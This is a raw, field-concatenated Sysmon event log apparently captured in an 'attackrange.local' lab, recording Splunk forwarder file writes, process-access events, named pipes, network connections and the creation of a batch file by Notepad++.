07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.555{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F0E08AA6E3918F1E9A68E65EAD02895,SHA256=33A380C1508F43B717145E143225ACAA2B8C40EADAC27FBA23C604C24C6E5700,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:01.279{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57208-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001047259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.728{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50961-false10.0.1.12-8000- 23542300x80000000000000001047271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:04.572{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=197A9AB4F9BDC197CB912F319BDCA544,SHA256=D83C71250D3E8E6CECBDC2177639F9161438A566A761F5DD03AB13508E91603B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:04.428{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CF11493BA679DF426062013F8595C1E,SHA256=E4252011A06FE9EEA1BB8C6A6AFFBC19971226E09B0C111406DB41EEB815AE0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:04.457{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=06C8AE7ED812851052778A1AFE15E838,SHA256=799F0025284F0048C041692A1F13DE94ED40841D84399DD76670D79396A8275B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:04.456{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAEF87BD0F755745293DA7AD8FECF87C,SHA256=9C5516111B39DC8070EBEE9EC7568D95E462B1C7EC19D40B4438359DF3FE0C0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:05.444{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02FCF41B13CF78CE28BA0C9173D4C523,SHA256=00F1C91694E964AA799913524F77D0ED7B1E72ADF4A21635A8687405E6A700FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:05.587{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61C58A5910CDA68D038E2A9F824FC915,SHA256=5F96BF0F5DCB159D08A67CCDCBA7597861C5A0ABA546D4457B47B9AAA4144253,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:06.709{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6423D47DA0DD9DEAD78CCF4BD5BF2B7,SHA256=916354ED5C160319356B1DF2EFD639E6CE8D026AFDD3DF0E64173B0B56CE3CB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:06.709{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA3587ADE22FA55F9C7B033593FF2E72,SHA256=EF450D869872E4B738411B1A8B7EE1F4F2AAF509984AE6168D52BE0E22C60CD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:06.475{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17D04774DD364E96A734DB528B7D35E0,SHA256=3E83A0FA7DA420D1F280B7D12877006DE00042FD167EAEF76DE7BA815C47DA13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB54404EC7F1D6A7C6BE0731AB731B7,SHA256=1FD9D9945A4C88E8341824F956918178E7EFD15DAF23B73FCF386559ABC5DB01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:06.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:06.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:06.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.202{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.133{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001047275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.133{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001047274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:48:06.133{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.3924.430.168737781C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001047273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:48:06.133{466BC892-53D9-60E8-E60F-00000000CF01}3924\chrome.3924.430.168737781C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000806789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:07.506{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F60102028FCEB62B873674FF9CC164C,SHA256=0E4EA710B67FC477687EF61D250B0DCCC5E81D3001815557EF06D8180F263E31,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:59.753{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50962-false10.0.1.12-8000- 354300x80000000000000001047280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:59.244{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57209-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001047279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:07.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C71C67B285AE52A32FE503C3A6B4852,SHA256=25587E3AE94C85ACA6FBA314BE3B2589AD0B9F58CA86485F819E4C161F82ACA5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:05.549{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-10074-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001047282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:08.616{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=357A5B22C9265F6A835C54E34A6ACC69,SHA256=ED2F4EA5D0B70C644CA63972C1A4619F9BFF6170BA54782E572887E4AB311A65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:08.522{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48D5DBBA7B57D475055E7D25CA73FFDD,SHA256=CEBB62D27BD20D4C824EC5E8AEB6BC72E5E7D545E12D15FEF71756AEA292DF77,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:05.845{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57209-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x80000000000000001047283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:09.631{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=378EFA370F67656C080F845FC31A9330,SHA256=7719259F8EA1EEB12864122DFAF1BAF01E80C9C29862FED4EF45C8B6A8EED541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:09.553{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E852ACE3D077D90036A6354C0B1392E1,SHA256=A5CF5F8C9981B384939DF0BCB32F0A079E5794E35435C286AC6546FA25F98173,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:07.186{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57210-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:10.553{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=762E679C2961DC33449EE8F038E10537,SHA256=DEEFA6BB301219A7C21F62CBE06BCAF9F4C56BB4CC5B4EC05BA5903E1A4A4CFB,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001047285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:10.968{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.bat2021-07-12 07:48:10.968 23542300x80000000000000001047284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:10.648{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D59565B27F726882981AB08A33FC04,SHA256=4EC02FFB30AA41C8A00017AB1E83DE42517EF61DB5189599B931E1E57FD93138,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:11.553{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D6D40C2AD26A75EFCC688EFEFA858C7,SHA256=C6914B7704D4BF97F1410655623A3EFD82FC957FFFAD7522A1E60E6AAB6A37CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:11.667{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8524F21E34A1D83E7DEC15DB6CE6D87,SHA256=57B283EDBB253327B91D39569D37A7482340D75C1E0BC94FB10F37760CA6FBEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:12.682{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=742838FAE294EBE49EDDACE13820E9E1,SHA256=F57C9C326CCD856E9A03E06F8102209B1855895D667E77E323311CC41C7DA75B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:12.600{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F627D46AA8922EE4A250A0779BA8D0DC,SHA256=AFB94ADC5FDDA9DE4C1FBCF7315B87440CB3606D77268BD1EE0896CB69F4760B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:13.616{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29978AB9D281AEBFD808C0BC54B54FDB,SHA256=F318AE4C03378263210AC87C5F691DD518B16AA97FE343B80E93DC0524A4C764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:13.697{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=309EECA8ED7717A5061ECA99AEBDBB78,SHA256=C966C387785762C0E1B9405BB1933C53173B64C866467BCA9D3CA020628B62AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:14.629{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F169DD8A4B92C1FE19C3599338254021,SHA256=549A4133BBBC39E8F32B09B83F4606D1A48A5CC889118C335889A343B8BF730C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:14.745{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45C0B0282C82515691F80B46109CC970,SHA256=AF96AC5C235BF6E22492FB8DDD9EB503FACDE65E9708713F97BADA610A438150,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 